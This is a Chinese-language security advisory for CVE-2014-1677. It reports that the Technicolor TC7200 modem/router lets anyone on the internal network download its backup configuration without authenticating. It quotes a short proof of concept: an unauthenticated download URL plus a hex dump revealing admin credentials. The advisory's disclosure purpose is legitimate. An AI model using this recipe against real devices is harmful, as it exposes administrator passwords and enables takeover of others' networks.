发布日期：2014-02-25
更新日期：2014-02-27

受影响系统：

technicolor TC7200 STD6.01.12

描述：

---

BUGTRAQ  ID: 65774
CVE(CAN) ID: CVE-2014-1677

Technicolor TC7200是调制解调器和路由器产品。

Technicolor TC7200 STD6.01.12及其他版本在没有进行身份验证的情况下，允许内部网络下载备份配置文件，这可导致泄露管理员凭证。

<*来源：Jeroen - IT Nerdbox
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

# Exploit Title: Technicolor TC7200: Authentication Bypass
# Google Dork: N/A
# Date: 24-02-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.technicolor.com/
# Software Link: http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways/cable-modems-gateways/tc7200-tc7300
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-1677
#

## Description:
#
# Any user on the internal network can download a backup configuration file without authenticating first. The backup file contains
# the credentials to the administrative web interface.
#
## PoC:
#
# Download the file: http://192.168.0.1/goform/system/GatewaySettings.bin
#
# Using the command: $ hexedit -C GatewaySettings.bin
#
# 00006590  00 00 00 00 00 00 00 00  30 4d 4c 6f 67 00 06 00 |........0MLog...|
# 000065a0  05 61 64 6d 69 6e 00 15  6d 79 73 75 70 65 72 73 |.admin..mysupers|
# 000065b0  65 63 72 65 74 70 61 73  73 77 6f 72 64 00 06 75 |ecretpassword..u|
# 000065c0  70 63 63 73 72 00 00                             |pccsr..|
# 000065c7
#
#

# More information can be found at:http://www.nerdbox.it/technicolor-tc7200-auth-bypass-dos/

建议：

---

厂商补丁：

technicolor
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew ays/cable-modems-gatewa

浏览次数：2981
严重程度：0（网友投票）